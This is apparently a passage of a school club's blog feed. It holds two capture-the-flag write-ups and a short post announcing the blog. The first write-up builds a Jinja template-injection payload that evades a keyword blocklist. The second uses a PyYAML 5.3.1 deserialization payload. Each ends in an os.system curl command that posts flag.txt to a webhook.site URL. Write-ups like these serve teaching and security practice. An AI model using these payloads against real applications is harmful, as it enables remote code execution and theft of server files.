blocklist = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read", "flag.txt"]
for bad in blocklist:
name = name.replace(bad, "")
print(f"<h1> Hello, {name}")
```

If one simply use `__import__`

, one will soon realise that it does not exist, this could have been done by deleting built-ins from the python run time.

We can restore the built-ins via `reload(__builtins__)`

, however it is obviously, also deleted.

We need to find `__import__`

somehow.

With some experimenting, we can find that

```
>>> ().__class__.__bases__
(<type 'object'>,)
```

The tuple inherits directly from `object`

, hence we can find the list of types (extends object) by sending the payload

`{{().__class__.__bases__[0].__subclasses__()}}`

```
Hello, [<class 'type'>, <class 'async_generator'>, <class 'int'>, <class 'bytearray_iterator'>, <class 'bytearray'>, <class 'bytes_iterator'>, <class 'bytes'>... <class 'flask.blueprints.BlueprintSetupState'>]
```

Much of the output is useless, `_frozen_importlib_external.FileLoader`

looks a bit suspicious though. (it is at position 118)

`{{().__class__.__bases__[0].__subclasses__()[118]}}`

```
Hello, <class '_frozen_importlib_external.FileLoader'>
```

Just verifying that the class is the `FileLoader`

, now lets see what builtins this FileLoader has

`{{().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"]}}`

```
Hello, {'__name__': 'builtins' ... '__import__': <built-in function __import__>, ...help, or help(object) for help about object.}
```

**Hooray!** We found `__import__`

, now we just have to combine the payload into

```
{{(().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"])["__im"+"port__"]("o"+"s").system("curl -X POST --data-binary @flflag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}}
```

`flag.txt`

is manually bypassed since it contains `flag`

```
{read{(()._read_class_read_._read_bases_read_[0]._read_subclasses_read_()[118]._read_init_read_._read_globals_read_["_read_builtins_read_"])["_read_im"+"port_read_"]("o"+"s").sreadystem("curl -X POST --data-binary @flfreadlag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}read}
<h1> Hello, {{(().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"])["__im"+"port__"]("o"+"s").system("curl -X POST --data-binary @flag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}}
```

The first line is our payload, and after running the same blocklist operations as the server, the resulting string looks ok.

`http://35.240.143.82:4209/?name={read{(()._read_class_read_._read_bases_read_[0]._read_subclasses_read_()[118]._read_init_read_._read_globals_read_["_read_builtins_read_"])["_read_im"+"port_read_"]("o"+"s").sreadystem("curl -X POST --data-binary @flfreadlag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}read}`

And after checking webhook.site

```
flag{server_side_rendering_is_fun_but_dangerous_sometimes}
```

Flag obtained

]]>You've used espace2, but what about espace0?

Flag in

`flag.txt`

As before the source, `main.py`

was given

```
from flask import Flask, request, render_template, Response
import yaml
app = Flask(__name__)
assert yaml.__version__ == "5.3.1"
@app.route("/")
def index():
return render_template("./index.html")
@app.route("/", methods=["POST"])
def welcome():
student_data = request.form.get("student_data")
if not student_data:
return Response("Please specify some data in YAML format", mimetype='text/plain')
student_data = yaml.load(student_data)
required_fields = ["id","name","class"]
if type(student_data) != dict or "student" not in student_data or any(x not in student_data["student"] for x in required_fields):
return Response("Malformed data. Please try again.", mimetype='text/plain')
student = student_data["student"]
return f"<h1>Welcome, {student['name']} ({student['id']})</h1> <br>Your class is <b>{student['class']}</b>"
```

There are no obvious vulnerabilities to this file.

But the `assert yaml.__version__ == "5.3.1"`

part is quite suspicious.

A quick google search with keywords `pyyaml 5.3.1 vulnerabilities`

leads us to `https://security.snyk.io/vuln/SNYK-PYTHON-PYYAML-590151`

, a 9.8 scored RCE.

Conveniently a `uiuctf`

writeup was included that explained how the exploit worked. https://hackmd.io/@harrier/uiuctf20

Apparently it was a zero day vulnerability used in a CTF, what a chad move. We can simply take their payload and use it here as google is allowed in CTFs.

`!!python/object/new:tuple [!!python/object/new:map [!!python/name:eval , [ 'PAYLOAD_HERE' ]]]`

`!!python/object/new:tuple [!!python/object/new:map [!!python/name:eval , [ '__import__("os").system("curl -X POST --data-binary @flag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")' ]]]`

And after checking webhook.site for the received curl request

```
flag{yet_another_mal-coded_library}
```

Flag obtained

]]>```
console.log("Hello, World!");
```

Jokes aside, while we don't have a fixed posting schedule presently, here are things you can expect: write-ups after our CTF events, medium-style articles by our members on the latest tech news, reflections and sharings on projects, or even musings from interesting experiences and events we hold for the school and community.

Now, if you're curious why this is a thing: my motivation for redesigning the AppVenture website (again) was because I hoped to make something that's simpler and maintainable in the future. I actually thought the original website in Go was really nice, but because AppVenture is moving to TypeScript and Vue, it'll be difficult to get people who can continue to maintain in the long term. I didn't like the next version in Nuxt.js, however, because with the little content we had, setting up a database felt overkill. It also meant more annoying backups than just copying a git repository around. And, that's how we ended up with Gridsome.

Since we're going to redesign the site, I thought it'll be a good chance to include more than just a project showcase. For an interest group, a blog seemed like a great chance for members to share about any cool things they may be up to. Especially with the new stuff launched this year, such as the cybersecurity division and monthly sharings. Of course, I can't predict how the future of this will go though, since it'll launch after I graduate. But, I'm pretty optimistic about it.

If you're interested in this blog, stay tuned for more!

(Psst: If you're a nushie interested to write something or simply cross-post your articles here, feel free to contact us)

]]>